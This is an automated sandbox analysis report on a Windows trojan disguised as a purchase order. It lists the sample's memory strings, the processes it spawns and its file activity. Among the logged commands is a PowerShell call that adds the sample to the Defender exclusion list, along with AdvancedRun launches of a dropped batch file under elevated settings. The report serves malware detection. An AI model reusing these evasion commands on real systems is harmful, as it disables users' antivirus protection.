                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-barcelona-real-madrid-psg-17164868
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-19941053
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/liverpool-sadio-mane-expected-goals-19932676
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.289131056.00000000024A0000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmp, 08042021New-PurchaseOrder.exe, 00000001.00000002.289339044.00000000024CE000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: https://www.liverpool.com/search/
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp, SWqTT.exe, 00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: 08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A2CBB01_2_00A2CBB0
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A244E01_2_00A244E0
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A24C581_2_00A24C58
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeCode function: 1_2_00A2CBA01_2_00A2CBA0
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010DA97032_2_010DA970
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010D28B832_2_010D28B8
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010D22D032_2_010D22D0
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeCode function: 32_2_010DA96B32_2_010DA96B
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: invalid certificate
                      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: AdvancedRun.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 08042021New-PurchaseOrder.exeBinary or memory string: OriginalFilename vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.306148340.0000000007CA8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameHcAj CBJ.exe2 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000000.202307233.0000000000142000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.293666584.00000000044C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.288756404.0000000000CB0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302392796.0000000006580000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.298745128.0000000005590000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.288723697.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000011.00000000.276780249.0000000000FA2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exeBinary or memory string: OriginalFilenameDimbono.exe0 vs 08042021New-PurchaseOrder.exe
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32
                      Source: classification engineClassification label: mal96.troj.evad.winEXE@35/25@2/2
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,5_2_00408FC9
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 6_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,6_2_00408FC9
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,5_2_004095FD
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,5_2_0040A33B
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeCode function: 5_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,5_2_00401306
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile created: C:\Users\user\JMfuFTspQyAokpYkLoiLJnktrYABdrUojJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6224:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4952
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1fJump to behavior
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: 08042021New-PurchaseOrder.exeReversingLabs: Detection: 14%
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile read: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe:Zone.IdentifierJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe'
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe C:\Users\user\Desktop\08042021New-PurchaseOrder.exe
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe'
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -ForceJump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess created: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe C:\Users\user\Desktop\08042021New-PurchaseOrder.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 08042021New-PurchaseOrder.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: System.Core.ni.pdbRSDSD source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe, 00000005.00000000.233606021.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000000.377976496.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000025.00000000.411827266.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000026.00000000.421152625.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.34.dr
                      Source: Binary string: System.Xml.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.pdbZ source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Configuration.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: mscorlib.pdb853321935-2125563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32# source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: jVisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: System.Configuration.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb-Q source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Core.ni.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: jLC:\Windows\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: O.pdb4( source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
                      Source: Binary string: mscorlib.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb5t source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302660548.0000000006764000.00000004.00000001.sdmp
                      Source: Binary string: System.Drawing.pdb source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: System.Drawing.pdb9 source: WER3A64.tmp.dmp.20.dr
                      Source: Binary string: mscorlib.ni.pdb source: WER3A64.tmp.dmp.20.dr
